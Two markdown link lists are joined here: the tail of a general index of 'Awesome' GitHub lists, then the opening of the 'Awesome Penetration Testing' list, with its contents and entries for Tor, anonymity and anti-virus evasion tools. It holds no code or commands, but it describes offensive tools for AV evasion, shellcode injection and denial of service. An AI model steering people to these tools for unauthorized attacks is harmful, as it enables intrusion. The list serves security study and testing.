- [Email Newsletters](https://github.com/zudochkin/awesome-newsletters#readme)
- [IT Quotes](https://github.com/victorlaerte/awesome-it-quotes#readme)
## Databases
- [Database](https://github.com/numetriclabz/awesome-db#readme)
- [MySQL](https://github.com/shlomi-noach/awesome-mysql#readme)
- [SQLAlchemy](https://github.com/dahlia/awesome-sqlalchemy#readme)
- [InfluxDB](https://github.com/mark-rushakoff/awesome-influxdb#readme)
- [Neo4j](https://github.com/neueda/awesome-neo4j#readme)
- [MongoDB](https://github.com/ramnes/awesome-mongodb#readme) - NoSQL database.
- [RethinkDB](https://github.com/d3viant0ne/awesome-rethinkdb#readme)
- [TinkerPop](https://github.com/mohataher/awesome-tinkerpop#readme) - Graph computing framework.
- [PostgreSQL](https://github.com/dhamaniasad/awesome-postgres#readme) - Object-relational database.
- [CouchDB](https://github.com/quangv/awesome-couchdb#readme) - Document-oriented NoSQL database.
- [HBase](https://github.com/rayokota/awesome-hbase#readme) - Distributed, scalable, big data store.
- [NoSQL Guides](https://github.com/erictleung/awesome-nosql-guides#readme) - Help on using non-relational, distributed, open-source, and horizontally scalable databases.
- [Contexture](https://github.com/chrislatorres/awesome-contexture#readme) - Abstracts queries/filters and results/aggregations from different backing data stores like ElasticSearch and MongoDB.
- [Database Tools](https://github.com/mgramin/awesome-db-tools#readme) - Everything that makes working with databases easier.
- [Grakn](https://github.com/graknlabs/awesome#readme) - Logical database to organize large and complex networks of data as one body of knowledge.
- [Cassandra](https://github.com/Anant/awesome-cassandra#readme) - Open-source, distributed, wide column store, NoSQL database management system.
## Media
- [Creative Commons Media](https://github.com/shime/creative-commons-media#readme)
- [Fonts](https://github.com/brabadu/awesome-fonts#readme)
- [Codeface](https://github.com/chrissimpkins/codeface#readme) - Text editor fonts.
- [Stock Resources](https://github.com/neutraltone/awesome-stock-resources#readme)
- [GIF](https://github.com/davisonio/awesome-gif#readme) - Image format known for animated images.
- [Music](https://github.com/ciconia/awesome-music#readme)
- [Open Source Documents](https://github.com/44bits/awesome-opensource-documents#readme)
- [Audio Visualization](https://github.com/willianjusten/awesome-audio-visualization#readme)
- [Broadcasting](https://github.com/ebu/awesome-broadcasting#readme)
- [Pixel Art](https://github.com/Siilwyn/awesome-pixel-art#readme) - Pixel-level digital art.
- [FFmpeg](https://github.com/transitive-bullshit/awesome-ffmpeg#readme) - Cross-platform solution to record, convert and stream audio and video.
- [Icons](https://github.com/notlmn/awesome-icons#readme) - Downloadable SVG/PNG/font icon projects.
- [Audiovisual](https://github.com/stingalleman/awesome-audiovisual#readme) - Lighting, audio and video in professional environments.
## Learn
- [CLI Workshoppers](https://github.com/therebelrobot/awesome-workshopper#readme) - Interactive tutorials.
- [Learn to Program](https://github.com/karlhorky/learn-to-program#readme)
- [Speaking](https://github.com/matteofigus/awesome-speaking#readme)
- [Tech Videos](https://github.com/lucasviola/awesome-tech-videos#readme)
- [Dive into Machine Learning](https://github.com/hangtwenty/dive-into-machine-learning#readme)
- [Computer History](https://github.com/watson/awesome-computer-history#readme)
- [Programming for Kids](https://github.com/HollyAdele/awesome-programming-for-kids#readme)
- [Educational Games](https://github.com/yrgo/awesome-educational-games#readme) - Learn while playing.
- [JavaScript Learning](https://github.com/micromata/awesome-javascript-learning#readme)
- [CSS Learning](https://github.com/micromata/awesome-css-learning#readme) - Mainly about CSS – the language and the modules.
- [Product Management](https://github.com/dend/awesome-product-management#readme) - Learn how to be a better product manager.
- [Roadmaps](https://github.com/liuchong/awesome-roadmaps#readme) - Gives you a clear route to improve your knowledge and skills.
- [YouTubers](https://github.com/JoseDeFreitas/awesome-youtubers#readme) - Watch video tutorials from YouTubers that teach you about technology.
## Security
- [Application Security](https://github.com/paragonie/awesome-appsec#readme)
- [Security](https://github.com/sbilly/awesome-security#readme)
- [CTF](https://github.com/apsdehal/awesome-ctf#readme) - Capture The Flag.
- [Malware Analysis](https://github.com/rshipp/awesome-malware-analysis#readme)
- [Android Security](https://github.com/ashishb/android-security-awesome#readme)
- [Hacking](https://github.com/carpedm20/awesome-hacking#readme)
- [Honeypots](https://github.com/paralax/awesome-honeypots#readme) - Deception trap, designed to entice an attacker into attempting to compromise the information systems in an organization.
- [Incident Response](https://github.com/meirwah/awesome-incident-response#readme)
- [Vehicle Security and Car Hacking](https://github.com/jaredthecoder/awesome-vehicle-security#readme)
- [Web Security](https://github.com/qazbnm456/awesome-web-security#readme) - Security of web apps & services.
- [Lockpicking](https://github.com/fabacab/awesome-lockpicking#readme) - The art of unlocking a lock by manipulating its components without the key.
- [Cybersecurity Blue Team](https://github.com/fabacab/awesome-cybersecurity-blueteam#readme) - Groups of individuals who identify security flaws in information technology systems.
- [Fuzzing](https://github.com/cpuu/awesome-fuzzing#readme) - Automated software testing technique that involves feeding pseudo-randomly generated input data.
- [Embedded and IoT Security](https://github.com/fkie-cad/awesome-embedded-and-iot-security#readme)
- [GDPR](https://github.com/bakke92/awesome-gdpr#readme) - Regulation on data protection and privacy for all individuals within EU.
- [DevSecOps](https://github.com/TaptuIT/awesome-devsecops#readme) - Integration of security practices into [DevOps](https://en.wikipedia.org/wiki/DevOps).
## Content Management Systems
- [Umbraco](https://github.com/umbraco-community/awesome-umbraco#readme)
- [Refinery CMS](https://github.com/refinerycms-contrib/awesome-refinerycms#readme) - Ruby on Rails CMS.
- [Wagtail](https://github.com/springload/awesome-wagtail#readme) - Django CMS focused on flexibility and user experience.
- [Textpattern](https://github.com/drmonkeyninja/awesome-textpattern#readme) - Lightweight PHP-based CMS.
- [Drupal](https://github.com/nirgn975/awesome-drupal#readme) - Extensible PHP-based CMS.
- [Craft CMS](https://github.com/craftcms/awesome#readme) - Content-first CMS.
- [Sitecore](https://github.com/MartinMiles/Awesome-Sitecore#readme) - .NET digital marketing platform that combines CMS with tools for managing multiple websites.
- [Silverstripe CMS](https://github.com/wernerkrauss/awesome-silverstripe-cms#readme) - PHP MVC framework that serves as a classic or headless CMS.
## Hardware
- [Robotics](https://github.com/Kiloreux/awesome-robotics#readme)
- [Internet of Things](https://github.com/HQarroum/awesome-iot#readme)
- [Electronics](https://github.com/kitspace/awesome-electronics#readme) - For electronic engineers and hobbyists.
- [Bluetooth Beacons](https://github.com/rabschi/awesome-beacon#readme)
- [Electric Guitar Specifications](https://github.com/gitfrage/guitarspecs#readme) - Checklist for building your own electric guitar.
- [Plotters](https://github.com/beardicus/awesome-plotters#readme) - Computer-controlled drawing machines and other visual art robots.
- [Robotic Tooling](https://github.com/protontypes/awesome-robotic-tooling#readme) - Free and open tools for professional robotic development.
- [LIDAR](https://github.com/szenergy/awesome-lidar#readme) - Sensor for measuring distances by illuminating the target with laser light.
## Business
- [Open Companies](https://github.com/opencompany/awesome-open-company#readme)
- [Places to Post Your Startup](https://github.com/mmccaff/PlacesToPostYourStartup#readme)
- [OKR Methodology](https://github.com/domenicosolazzo/awesome-okr#readme) - Goal setting & communication best practices.
- [Leading and Managing](https://github.com/LappleApple/awesome-leading-and-managing#readme) - Leading people and being a manager in a technology company/environment.
- [Indie](https://github.com/mezod/awesome-indie#readme) - Independent developer businesses.
- [Tools of the Trade](https://github.com/cjbarber/ToolsOfTheTrade#readme) - Tools used by companies on Hacker News.
- [Clean Tech](https://github.com/nglgzz/awesome-clean-tech#readme) - Fighting climate change with technology.
- [Wardley Maps](https://github.com/wardley-maps-community/awesome-wardley-maps#readme) - Provides high situational awareness to help improve strategic planning and decision making.
- [Social Enterprise](https://github.com/RayBB/awesome-social-enterprise#readme) - Building an organization primarily focused on social impact that is at least partially self-funded.
- [Engineering Team Management](https://github.com/kdeldycke/awesome-engineering-team-management#readme) - How to transition from software development to engineering management.
- [Developer-First Products](https://github.com/agamm/awesome-developer-first#readme) - Products that target developers as the user.
## Work
- [Slack](https://github.com/matiassingers/awesome-slack#readme) - Team collaboration.
- [Communities](https://github.com/filipelinhares/awesome-slack#readme)
- [Remote Jobs](https://github.com/lukasz-madon/awesome-remote-job#readme)
- [Productivity](https://github.com/jyguyomarch/awesome-productivity#readme)
- [Niche Job Boards](https://github.com/tramcar/awesome-job-boards#readme)
- [Programming Interviews](https://github.com/DopplerHQ/awesome-interview-questions#readme)
- [Code Review](https://github.com/joho/awesome-code-review#readme) - Reviewing code.
- [Creative Technology](https://github.com/j0hnm4r5/awesome-creative-technology#readme) - Businesses & groups that specialize in combining computing, design, art, and user experience.
## Networking
- [Software-Defined Networking](https://github.com/sdnds-tw/awesome-sdn#readme)
- [Network Analysis](https://github.com/briatte/awesome-network-analysis#readme)
- [PCAPTools](https://github.com/caesar0301/awesome-pcaptools#readme)
- [Real-Time Communications](https://github.com/rtckit/awesome-rtc#readme) - Network protocols for near simultaneous exchange of media and data.
## Decentralized Systems
- [Bitcoin](https://github.com/igorbarinov/awesome-bitcoin#readme) - Bitcoin services and tools for software developers.
- [Ripple](https://github.com/vhpoet/awesome-ripple#readme) - Open source distributed settlement network.
- [Non-Financial Blockchain](https://github.com/machinomy/awesome-non-financial-blockchain#readme) - Non-financial blockchain applications.
- [Mastodon](https://github.com/tleb/awesome-mastodon#readme) - Open source decentralized microblogging network.
- [Ethereum](https://github.com/ttumiel/Awesome-Ethereum#readme) - Distributed computing platform for smart contract development.
- [Blockchain AI](https://github.com/steven2358/awesome-blockchain-ai#readme) - Blockchain projects for artificial intelligence and machine learning.
- [EOSIO](https://github.com/DanailMinchev/awesome-eosio#readme) - A decentralized operating system supporting industrial-scale apps.
- [Corda](https://github.com/chainstack/awesome-corda#readme) - Open source blockchain platform designed for business.
- [Waves](https://github.com/msmolyakov/awesome-waves#readme) - Open source blockchain platform and development toolset for Web 3.0 apps and decentralized solutions.
- [Substrate](https://github.com/substrate-developer-hub/awesome-substrate#readme) - Framework for writing scalable, upgradeable blockchains in Rust.
## Higher Education
- [Computational Neuroscience](https://github.com/eselkin/awesome-computational-neuroscience#readme) - A multidisciplinary science which uses computational approaches to study the nervous system.
- [Digital History](https://github.com/maehr/awesome-digital-history#readme) - Computer-aided scientific investigation of history.
- [Scientific Writing](https://github.com/writing-resources/awesome-scientific-writing#readme) - Distraction-free scientific writing with Markdown, reStructuredText and Jupyter notebooks.
## Events
- [Creative Tech Events](https://github.com/danvoyce/awesome-creative-tech-events#readme) - Events around the globe for creative coding, tech, design, music, arts and cool stuff.
- [Events in Italy](https://github.com/ildoc/awesome-italy-events#readme) - Tech-related events in Italy.
- [Events in the Netherlands](https://github.com/awkward/awesome-netherlands-events#readme) - Tech-related events in the Netherlands.
## Testing
- [Testing](https://github.com/TheJambo/awesome-testing#readme) - Software testing.
- [Visual Regression Testing](https://github.com/mojoaxel/awesome-regression-testing#readme) - Ensures changes did not break the functionality or style.
- [Selenium](https://github.com/christian-bromann/awesome-selenium#readme) - Open-source browser automation framework and ecosystem.
- [Appium](https://github.com/SrinivasanTarget/awesome-appium#readme) - Test automation tool for apps.
- [TAP](https://github.com/sindresorhus/awesome-tap#readme) - Test Anything Protocol.
- [JMeter](https://github.com/aliesbelik/awesome-jmeter#readme) - Load testing and performance measurement tool.
- [k6](https://github.com/k6io/awesome-k6#readme) - Open-source, developer-centric performance monitoring and load testing solution.
- [Playwright](https://github.com/mxschmitt/awesome-playwright#readme) - Node.js library to automate Chromium, Firefox and WebKit with a single API.
- [Quality Assurance Roadmap](https://github.com/fityanos/awesome-quality-assurance-roadmap#readme) - How to start & build a career in software testing.
## Miscellaneous
- [JSON](https://github.com/burningtree/awesome-json#readme) - Text based data interchange format.
- [GeoJSON](https://github.com/tmcw/awesome-geojson#readme)
- [Datasets](https://github.com/jdorfman/awesome-json-datasets#readme)
- [CSV](https://github.com/secretGeek/awesomeCSV#readme) - A text file format that stores tabular data and uses a comma to separate values.
- [Discounts for Student Developers](https://github.com/AchoArnold/discount-for-student-dev#readme)
- [Radio](https://github.com/kyleterry/awesome-radio#readme)
- [Awesome](https://github.com/sindresorhus/awesome#readme) - Recursion illustrated.
- [Analytics](https://github.com/onurakpolat/awesome-analytics#readme)
- [REST](https://github.com/marmelab/awesome-rest#readme)
- [Continuous Integration and Continuous Delivery](https://github.com/cicdops/awesome-ciandcd#readme)
- [Services Engineering](https://github.com/mmcgrana/services-engineering#readme)
- [Free for Developers](https://github.com/ripienaar/free-for-dev#readme)
- [Answers](https://github.com/cyberglot/awesome-answers#readme) - Stack Overflow, Quora, etc.
- [Sketch](https://github.com/diessica/awesome-sketch#readme) - Design app for macOS.
- [Boilerplate Projects](https://github.com/melvin0008/awesome-projects-boilerplates#readme)
- [Readme](https://github.com/matiassingers/awesome-readme#readme)
- [Design and Development Guides](https://github.com/NARKOZ/guides#readme)
- [Software Engineering Blogs](https://github.com/kilimchoi/engineering-blogs#readme)
- [Self Hosted](https://github.com/awesome-selfhosted/awesome-selfhosted#readme)
- [FOSS Production Apps](https://github.com/DataDaoDe/awesome-foss-apps#readme)
- [Gulp](https://github.com/alferov/awesome-gulp#readme) - Task runner.
- [AMA](https://github.com/sindresorhus/amas#readme) - Ask Me Anything.
- [Answers](https://github.com/stoeffel/awesome-ama-answers#readme)
- [Open Source Photography](https://github.com/ibaaj/awesome-OpenSourcePhotography#readme)
- [OpenGL](https://github.com/eug/awesome-opengl#readme) - Cross-platform API for rendering 2D and 3D graphics.
- [GraphQL](https://github.com/chentsulin/awesome-graphql#readme)
- [Urban & Regional Planning](https://github.com/APA-Technology-Division/urban-and-regional-planning-resources#readme) - Concerning the built environment and communities.
- [Transit](https://github.com/CUTR-at-USF/awesome-transit#readme)
- [Research Tools](https://github.com/emptymalei/awesome-research#readme)
- [Data Visualization](https://github.com/fasouto/awesome-dataviz#readme)
- [Social Media Share Links](https://github.com/vinkla/shareable-links#readme)
- [Microservices](https://github.com/mfornos/awesome-microservices#readme)
- [Unicode](https://github.com/jagracey/Awesome-Unicode#readme) - Unicode standards, quirks, packages and resources.
- [Code Points](https://github.com/Codepoints/awesome-codepoints#readme)
- [Beginner-Friendly Projects](https://github.com/MunGell/awesome-for-beginners#readme)
- [Katas](https://github.com/gamontal/awesome-katas#readme)
- [Tools for Activism](https://github.com/drewrwilson/toolsforactivism#readme)
- [Citizen Science](https://github.com/dylanrees/citizen-science#readme) - For community-based and non-institutional scientists.
- [MQTT](https://github.com/hobbyquaker/awesome-mqtt#readme) - "Internet of Things" connectivity protocol.
- [Hacking Spots](https://github.com/daviddias/awesome-hacking-locations#readme)
- [For Girls](https://github.com/cristianoliveira/awesome4girls#readme)
- [Vorpal](https://github.com/vorpaljs/awesome-vorpal#readme) - Node.js CLI framework.
- [Vulkan](https://github.com/vinjn/awesome-vulkan#readme) - Low-overhead, cross-platform 3D graphics and compute API.
- [LaTeX](https://github.com/egeerardyn/awesome-LaTeX#readme) - Typesetting language.
- [Economics](https://github.com/antontarasenko/awesome-economics#readme) - An economist's starter kit.
- [Funny Markov Chains](https://github.com/sublimino/awesome-funny-markov#readme)
- [Bioinformatics](https://github.com/danielecook/Awesome-Bioinformatics#readme)
- [Cheminformatics](https://github.com/hsiaoyi0504/awesome-cheminformatics#readme) - Informatics techniques applied to problems in chemistry.
- [Colorful](https://github.com/Siddharth11/Colorful#readme) - Choose your next color scheme.
- [Steam](https://github.com/scholtzm/awesome-steam#readme) - Digital distribution platform.
- [Bots](https://github.com/hackerkid/bots#readme) - Building bots.
- [Site Reliability Engineering](https://github.com/dastergon/awesome-sre#readme)
- [Empathy in Engineering](https://github.com/KimberlyMunoz/empathy-in-engineering#readme) - Building and promoting more compassionate engineering cultures.
- [DTrace](https://github.com/xen0l/awesome-dtrace#readme) - Dynamic tracing framework.
- [Userscripts](https://github.com/bvolpato/awesome-userscripts#readme) - Enhance your browsing experience.
- [Pokémon](https://github.com/tobiasbueschel/awesome-pokemon#readme) - Pokémon and Pokémon GO.
- [ChatOps](https://github.com/exAspArk/awesome-chatops#readme) - Managing technical and business operations through a chat.
- [Falsehood](https://github.com/kdeldycke/awesome-falsehood#readme) - Falsehoods programmers believe in.
- [Domain-Driven Design](https://github.com/heynickc/awesome-ddd#readme) - Software development approach for complex needs by connecting the implementation to an evolving model.
- [Quantified Self](https://github.com/woop/awesome-quantified-self#readme) - Self-tracking through technology.
- [SaltStack](https://github.com/hbokh/awesome-saltstack#readme) - Python-based config management system.
- [Web Design](https://github.com/nicolesaidy/awesome-web-design#readme) - For digital designers.
- [Creative Coding](https://github.com/terkelg/awesome-creative-coding#readme) - Programming something expressive instead of something functional.
- [No-Login Web Apps](https://github.com/aviaryan/awesome-no-login-web-apps#readme) - Web apps that work without login.
- [Free Software](https://github.com/johnjago/awesome-free-software#readme) - Free as in freedom.
- [Framer](https://github.com/podo/awesome-framer#readme) - Prototyping interactive UI designs.
- [Markdown](https://github.com/BubuAnabelas/awesome-markdown#readme) - Markup language.
- [Dev Fun](https://github.com/mislavcimpersak/awesome-dev-fun#readme) - Funny developer projects.
- [Healthcare](https://github.com/kakoni/awesome-healthcare#readme) - Open source healthcare software for facilities, providers, developers, policy experts, and researchers.
- [Magento 2](https://github.com/DavidLambauer/awesome-magento2#readme) - Open Source eCommerce built with PHP.
- [TikZ](https://github.com/xiaohanyu/awesome-tikz#readme) - Graph drawing packages for TeX/LaTeX/ConTeXt.
- [Neuroscience](https://github.com/analyticalmonk/awesome-neuroscience#readme) - Study of the nervous system and brain.
- [Ad-Free](https://github.com/johnjago/awesome-ad-free#readme) - Ad-free alternatives.
- [Esolangs](https://github.com/angrykoala/awesome-esolangs#readme) - Programming languages designed for experimentation or as jokes rather than actual use.
- [Prometheus](https://github.com/roaldnefs/awesome-prometheus#readme) - Open-source monitoring system.
- [Homematic](https://github.com/homematic-community/awesome-homematic#readme) - Smart home devices.
- [Ledger](https://github.com/sfischer13/awesome-ledger#readme) - Double-entry accounting on the command-line.
- [Web Monetization](https://github.com/thomasbnt/awesome-web-monetization#readme) - A free open web standard service that allows you to send money directly in your browser.
- [Uncopyright](https://github.com/johnjago/awesome-uncopyright#readme) - Public domain works.
- [Crypto Currency Tools & Algorithms](https://github.com/Zheaoli/awesome-coins#readme) - Digital currency where encryption is used to regulate the generation of units and verify transfers.
- [Diversity](https://github.com/folkswhocode/awesome-diversity#readme) - Creating a more inclusive and diverse tech community.
- [Open Source Supporters](https://github.com/zachflower/awesome-open-source-supporters#readme) - Companies that offer their tools and services for free to open source projects.
- [Design Principles](https://github.com/robinstickel/awesome-design-principles#readme) - Create better and more consistent designs and experiences.
- [Theravada](https://github.com/johnjago/awesome-theravada#readme) - Teachings from the Theravada Buddhist tradition.
- [inspectIT](https://github.com/inspectit-labs/awesome-inspectit#readme) - Open source Java app performance management tool.
- [Open Source Maintainers](https://github.com/nayafia/awesome-maintainers#readme) - The experience of being an open source maintainer.
- [Calculators](https://github.com/xxczaki/awesome-calculators#readme) - Calculators for every platform.
- [Captcha](https://github.com/ZYSzys/awesome-captcha#readme) - A type of challenge–response test used in computing to determine whether or not the user is human.
- [Jupyter](https://github.com/markusschanta/awesome-jupyter#readme) - Create and share documents that contain code, equations, visualizations and narrative text.
- [FIRST Robotics Competition](https://github.com/andrewda/awesome-frc#readme) - International high school robotics championship.
- [Humane Technology](https://github.com/humanetech-community/awesome-humane-tech#readme) - Open source projects that help improve society.
- [Speakers](https://github.com/karlhorky/awesome-speakers#readme) - Conference and meetup speakers in the programming and design community.
- [Board Games](https://github.com/edm00se/awesome-board-games#readme) - Table-top gaming fun for all.
- [Software Patreons](https://github.com/uraimo/awesome-software-patreons#readme) - Fund individual programmers or the development of open source projects.
- [Parasite](https://github.com/ecohealthalliance/awesome-parasite#readme) - Parasites and host-pathogen interactions.
- [Food](https://github.com/jzarca01/awesome-food#readme) - Food-related projects on GitHub.
- [Mental Health](https://github.com/dreamingechoes/awesome-mental-health#readme) - Mental health awareness and self-care in the software industry.
- [Bitcoin Payment Processors](https://github.com/alexk111/awesome-bitcoin-payment-processors#readme) - Start accepting Bitcoin.
- [Scientific Computing](https://github.com/nschloe/awesome-scientific-computing#readme) - Solving complex scientific problems using computers.
- [Amazon Sellers](https://github.com/ScaleLeap/awesome-amazon-seller#readme)
- [Agriculture](https://github.com/brycejohnston/awesome-agriculture#readme) - Open source technology for farming and gardening.
- [Product Design](https://github.com/matttga/awesome-product-design#readme) - Design a product from the initial concept to production.
- [Prisma](https://github.com/catalinmiron/awesome-prisma#readme) - Turn your database into a GraphQL API.
- [Software Architecture](https://github.com/simskij/awesome-software-architecture#readme) - The discipline of designing and building software.
- [Connectivity Data and Reports](https://github.com/stevesong/awesome-connectivity-info#readme) - Better understand who has access to telecommunication and internet infrastructure and on what terms.
- [Stacks](https://github.com/stackshareio/awesome-stacks#readme) - Tech stacks for building different apps and features.
- [Cytodata](https://github.com/cytodata/awesome-cytodata#readme) - Image-based profiling of biological phenotypes for computational biologists.
- [IRC](https://github.com/davisonio/awesome-irc#readme) - Open source messaging protocol.
- [Advertising](https://github.com/cenoura/awesome-ads#readme) - Advertising and programmatic media for websites.
- [Earth](https://github.com/philsturgeon/awesome-earth#readme) - Find ways to resolve the climate crisis.
- [Naming](https://github.com/gruhn/awesome-naming#readme) - Naming things in computer science done right.
- [Biomedical Information Extraction](https://github.com/caufieldjh/awesome-bioie#readme) - How to extract information from unstructured biomedical data and text.
- [Web Archiving](https://github.com/iipc/awesome-web-archiving#readme) - An effort to preserve the Web for future generations.
- [WP-CLI](https://github.com/schlessera/awesome-wp-cli#readme) - Command-line interface for WordPress.
- [Credit Modeling](https://github.com/mourarthur/awesome-credit-modeling#readme) - Methods for classifying credit applicants into risk classes.
- [Ansible](https://github.com/KeyboardInterrupt/awesome-ansible#readme) - A Python-based, open source IT configuration management and automation platform.
- [Biological Visualizations](https://github.com/keller-mark/awesome-biological-visualizations#readme) - Interactive visualization of biological data on the web.
- [QR Code](https://github.com/aureooms/awesome-qr-code#readme) - A type of matrix barcode that can be used to store and share a small amount of information.
- [Veganism](https://github.com/sdassow/awesome-veganism#readme) - Making the plant-based lifestyle easy and accessible.
- [Translations](https://github.com/mbiesiad/awesome-translations#readme) - The transfer of the meaning of a text from one language to another.
## Related
- [All Awesome Lists](https://github.com/topics/awesome) - All the Awesome lists on GitHub.
- [Awesome Indexed](https://awesome-indexed.mathew-davies.co.uk) - Search the Awesome dataset.
- [Awesome Search](https://awesomelists.top) - Quick search for Awesome lists.
- [StumbleUponAwesome](https://github.com/basharovV/StumbleUponAwesome) - Discover random pages from the Awesome dataset using a browser extension.
- [Awesome CLI](https://github.com/umutphp/awesome-cli) - A simple command-line tool to dive into Awesome lists.
- [Awesome Viewer](http://awesome.digitalbunker.dev) - A visualizer for all of the above Awesome lists.
|
# Awesome Penetration Testing [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re)
> A collection of awesome penetration testing and offensive cybersecurity resources.
[Penetration testing](https://en.wikipedia.org/wiki/Penetration_test) is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities. Should you discover a vulnerability, please follow [this guidance](https://kb.cert.org/vuls/guidance/) to report it responsibly.
Your contributions and suggestions are heartily♥ welcome. (✿◕‿◕). Please check the [Contributing Guidelines](CONTRIBUTING.md) for more details. This work is licensed under a [Creative Commons Attribution 4.0 International License](https://creativecommons.org/licenses/by/4.0/).
[This project is supported by Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_content=awesome+penetration+testing&utm_medium=referral&utm_campaign=generic+advert)
## Contents
* [Android Utilities](#android-utilities)
* [Anonymity Tools](#anonymity-tools)
* [Tor Tools](#tor-tools)
* [Anti-virus Evasion Tools](#anti-virus-evasion-tools)
* [Books](#books)
* [Malware Analysis Books](#malware-analysis-books)
* [CTF Tools](#ctf-tools)
* [Cloud Platform Attack Tools](#cloud-platform-attack-tools)
* [Collaboration Tools](#collaboration-tools)
* [Conferences and Events](#conferences-and-events)
* [Asia](#asia)
* [Europe](#europe)
* [North America](#north-america)
* [South America](#south-america)
* [Zealandia](#zealandia)
* [Exfiltration Tools](#exfiltration-tools)
* [Exploit Development Tools](#exploit-development-tools)
* [File Format Analysis Tools](#file-format-analysis-tools)
* [GNU/Linux Utilities](#gnulinux-utilities)
* [Hash Cracking Tools](#hash-cracking-tools)
* [Hex Editors](#hex-editors)
* [Industrial Control and SCADA Systems](#industrial-control-and-scada-systems)
* [Intentionally Vulnerable Systems](#intentionally-vulnerable-systems)
* [Intentionally Vulnerable Systems as Docker Containers](#intentionally-vulnerable-systems-as-docker-containers)
* [Lock Picking](#lock-picking)
* [macOS Utilities](#macos-utilities)
* [Multi-paradigm Frameworks](#multi-paradigm-frameworks)
* [Network Tools](#network-tools)
* [DDoS Tools](#ddos-tools)
* [Network Reconnaissance Tools](#network-reconnaissance-tools)
* [Protocol Analyzers and Sniffers](#protocol-analyzers-and-sniffers)
* [Network Traffic Replay and Editing Tools](#network-traffic-replay-and-editing-tools)
* [Proxies and Machine-in-the-Middle (MITM) Tools](#proxies-and-machine-in-the-middle-mitm-tools)
* [Transport Layer Security Tools](#transport-layer-security-tools)
* [Wireless Network Tools](#wireless-network-tools)
* [Network Vulnerability Scanners](#network-vulnerability-scanners)
* [Web Vulnerability Scanners](#web-vulnerability-scanners)
* [Open Sources Intelligence (OSINT)](#open-sources-intelligence-osint)
* [Data broker and search engine services](#data-broker-and-search-engine-services)
* [Dorking tools](#dorking-tools)
* [Email search and analysis tools](#email-search-and-analysis-tools)
* [Metadata harvesting and analysis](#metadata-harvesting-and-analysis)
* [Network device discovery tools](#network-device-discovery-tools)
* [OSINT Online Resources](#osint-online-resources)
* [Source code repository searching tools](#source-code-repository-searching-tools)
* [Web application and resource analysis tools](#web-application-and-resource-analysis-tools)
* [Online Resources](#online-resources)
* [Online Code Samples and Examples](#online-code-samples-and-examples)
* [Online Exploit Development Resources](#online-exploit-development-resources)
* [Online Lock Picking Resources](#online-lock-picking-resources)
* [Online Operating Systems Resources](#online-operating-systems-resources)
* [Online Penetration Testing Resources](#online-penetration-testing-resources)
* [Other Lists Online](#other-lists-online)
* [Penetration Testing Report Templates](#penetration-testing-report-templates)
* [Operating System Distributions](#operating-system-distributions)
* [Periodicals](#periodicals)
* [Physical Access Tools](#physical-access-tools)
* [Privilege Escalation Tools](#privilege-escalation-tools)
* [Password Spraying Tools](#password-spraying-tools)
* [Reverse Engineering](#reverse-engineering)
* [Reverse Engineering Books](#reverse-engineering-books)
* [Reverse Engineering Tools](#reverse-engineering-tools)
* [Security Education Courses](#security-education-courses)
* [Shellcoding Guides and Tutorials](#exploit-development-online-resources)
* [Side-channel Tools](#side-channel-tools)
* [Social Engineering](#social-engineering)
* [Social Engineering Books](#social-engineering-books)
* [Social Engineering Online Resources](#social-engineering-online-resources)
* [Social Engineering Tools](#social-engineering-tools)
* [Static Analyzers](#static-analyzers)
* [Steganography Tools](#steganography-tools)
* [Vulnerability Databases](#vulnerability-databases)
* [Web Exploitation](#web-exploitation)
* [Intercepting Web proxies](#intercepting-web-proxies)
* [Web file inclusion tools](#web-file-inclusion-tools)
* [Web injection tools](#web-injection-tools)
* [Web path discovery and bruteforcing tools](#web-path-discovery-and-bruteforcing-tools)
* [Web shells and C2 frameworks](#web-shells-and-c2-frameworks)
* [Web-accessible source code ripping tools](#web-accessible-source-code-ripping-tools)
* [Web Exploitation Books](#web-exploitation-books)
* [Windows Utilities](#windows-utilities)
## Android Utilities
* [cSploit](https://www.csploit.org/) - Advanced IT security professional toolkit on Android featuring an integrated Metasploit daemon and MITM capabilities.
* [Fing](https://www.fing.com/products/fing-app/) - Network scanning and host enumeration app that performs NetBIOS, UPnP, Bonjour, SNMP, and various other advanced device fingerprinting techniques.
## Anonymity Tools
* [I2P](https://geti2p.net/) - The Invisible Internet Project.
* [Metadata Anonymization Toolkit (MAT)](https://0xacab.org/jvoisin/mat2) - Metadata removal tool, supporting a wide range of commonly used file formats, written in Python3.
* [What Every Browser Knows About You](http://webkay.robinlinus.com/) - Comprehensive detection page to test your own Web browser's configuration for privacy and identity leaks.
### Tor Tools
See also [awesome-tor](https://github.com/ajvb/awesome-tor).
* [Nipe](https://github.com/GouveaHeitor/nipe) - Script to redirect all traffic from the machine to the Tor network.
* [OnionScan](https://onionscan.org/) - Tool for investigating the Dark Web by finding operational security issues introduced by Tor hidden service operators.
* [Tails](https://tails.boum.org/) - Live operating system aiming to preserve your privacy and anonymity.
* [Tor](https://www.torproject.org/) - Free software and onion routed overlay network that helps you defend against traffic analysis.
* [dos-over-tor](https://github.com/skizap/dos-over-tor) - Proof of concept denial of service over Tor stress test tool.
* [kalitorify](https://github.com/brainfuckSec/kalitorify) - Transparent proxy through Tor for Kali Linux OS.
## Anti-virus Evasion Tools
* [AntiVirus Evasion Tool (AVET)](https://github.com/govolution/avet) - Post-process exploits containing executable files targeted for Windows machines to avoid being recognized by antivirus software.
* [CarbonCopy](https://github.com/paranoidninja/CarbonCopy) - Tool that creates a spoofed certificate of any online website and signs an Executable for AV evasion.
* [Hyperion](http://nullsecurity.net/tools/binary.html) - Runtime encryptor for 32-bit portable executables ("PE `.exe`s").
* [Shellter](https://www.shellterproject.com/) - Dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
* [UniByAv](https://github.com/Mr-Un1k0d3r/UniByAv) - Simple obfuscator that takes raw shellcode and generates Anti-Virus friendly executables by using a brute-forcable, 32-bit XOR key.
* [Veil](https://www.veil-framework.com/) - Generate metasploit payloads that bypass common anti-virus solutions.
* [peCloakCapstone](https://github.com/v-p-b/peCloakCapstone) - Multi-platform fork of the peCloak.py automated malware antivirus evasion tool.
## Books
See also [DEF CON Suggested Reading](https://www.defcon.org/html/links/book-list.html).
* [Advanced Penetration Testing by Wil Allsopp, 2017](https://www.amazon.com/Advanced-Penetration-Testing-Hacking-Networks/dp/1119367689/)
